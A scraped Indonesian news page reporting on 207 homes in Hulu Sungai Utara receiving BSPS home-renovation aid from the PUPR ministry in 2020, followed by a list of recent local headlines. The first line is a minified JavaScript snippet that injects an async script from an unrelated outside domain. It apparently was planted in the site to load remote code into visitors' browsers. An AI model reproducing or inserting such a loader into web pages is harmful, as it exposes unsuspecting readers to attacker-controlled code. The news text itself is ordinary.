(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

207 Rumah di HSU Terima Bantuan Stimulan Bedah Rumah Kementerian PUPR


KANALKALIMANTAN.COM, AMUNTAI – Sebanyak 207 rumah warga di Kabupaten Hulu Sungai Utara (HSU) mendapatkan kucuran Bantuan Stimulan Perumahan Swadaya (BSPS) atau program bedah rumah di tahun 2020 dari Kementrian PUPR.

Hal ini dikemukakan Najeriansyah, Plt Kepala Dinas Perumahan Kawasan Pemukiman dan Lingkungan Hidup (Disperkim LH) Kabupaten HSU saat rapat koordiansi pelaksanaan bantuan swadaya dana alokasi perumahan di aula Disperkim LH HSU, Selasa (1/9/2020).

Sekadar diketahui, BSPS merupakan bantuan pemerintah dalam upaya membantu perumahan Masyarakat Berpenghasilan Rendah (MBR) dalam meningkatkan kualitas rumah dan pembangunan rumah yang lebih layak.

BSPS memiliki dua kategori yaitu, Peningkatan Kualitas Rumah Swadaya (PKRS) dan Pembangunan Rumah Baru Swadaya (PBRS).

“PKRS ditunjukan untuk memperbaiki rumah yang tidak layak huni sementara PBRS untuk pembanguan rumah baru pengganti rumah rusak total,” kata Najeri.

Lebih lanjut Najeriansyah mengatakan, bantuan yang diluncurkan dari pemerintah pusat ini untuk Kabupaten HSU ada 4 kecamatan 12 desa dengan jumlah rumah 207 buah.

“Untuk tahun 2020 ini ada di Amuntai Tengah, Sungai Pandan, Amuntai Selatan dan Banjang,” kata Najeri –biasa disapa-.

Target sasaran yang dituju adalah MBR dan tentunya rumah yang tidak layak huni, untuk program yaitu bantuan PKRS dengan alokasi dana diberikan senilai Rp 17,5 juta per rumah.

Untuk penerima bantuan beradasar hasil dari data Musyawarah Rencana Pembangunan (Musrembang)  tahun 2019 di setiap desa, kemudian ditindak lanjuti dengan verifikasi apakah benar berhak mendapatkan bantuan bedah rumah tersebut.

“Program ini membantu warga kita yang rumahnya tidak layak huni, diberi stimulus untuk direhab agar menjadi layak huni,” beber Najeri.

Sementara itu, Wakil Bupati HSU H Husairi Abdi mendapat kabar ini mengaku bersyukur dengan adanya bantuan bedah rumah dari pemerintah pusat.

“Ini salah usaha pemerintah dalam memberikan kualitas rumah layak huni bagi masyarakat yang kurang mampu,” katanya.

Wabup HSU berpesan kepada seluruh kepala desa dan camat yang bakal mendapatkan bantuan bedah rumah, memantau bantuan bedah rumah ini tepat sasaran.

“Banyak atau sedikit bantuan didapatkan kita menfaatkan  sebaik mungkin untuk kemaslahatan masyarakat,” tandasnya. (kanalkalimantan.com/dew)

Reporter : dew
Editor : bie

Al Ghifari

Recent Posts

Banjir Rob Murung Selong Banjarmasin 407 Jiwa Terdampak

KANALKALIMANTAN.COM, BANJARMASIN - Banjir rob yang menggenangi kawasan Murung Selong, Kelurahan Sungai Lulut, Kota Banjarmasin,… Read More

3 jam ago

Tanggul Halangi Air Keluar di Komplek PWI, Ketua DPRD Banjarmasin Minta Dibongkar

KANALKALIMANTAN.COM, BANJARMASIN - Ketua DPRD Kota Banjarmasin, Rikval Fachruri meninjau banjir rob di komplek Persatuan… Read More

3 jam ago

Banjir di Gang Serumpun Sungai Lulut Masih Selutut

KANALKALIMANTAN.COM, BANJARMASIN — Banjir rob yang menggenangi Jalan Hikmah Banua, Gang Serumpun RT 27, Kelurahan… Read More

5 jam ago

BLK Kalsel Buka Pendaftaran Pelatihan Kerja Tahun 2026

KANALKALIMANTAN.COM, BANJARBARU - Balai Latihan Kerja (BLK) di bawah Dinas Tenaga Kerja dan Transmigrasi (Disnakertrans)… Read More

9 jam ago

Besok, Presiden RI Resmikan 166 Sekolah Rakyat Terpadu di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota Banjarbaru bersiap menyambut kunjungan Presiden Republik Indonesia, Prabowo Subianto berserta… Read More

11 jam ago

Remaja 13 Tahun Terseret Arus di Sungai Martapura

KANALKALIMANTAN.COM, BANJARMASIN — Seorang remaja laki-laki dilaporkan tenggelam di Sungai Martapura, Jalan Rantauan Darat, Kecamatan… Read More

1 hari ago

This website uses cookies.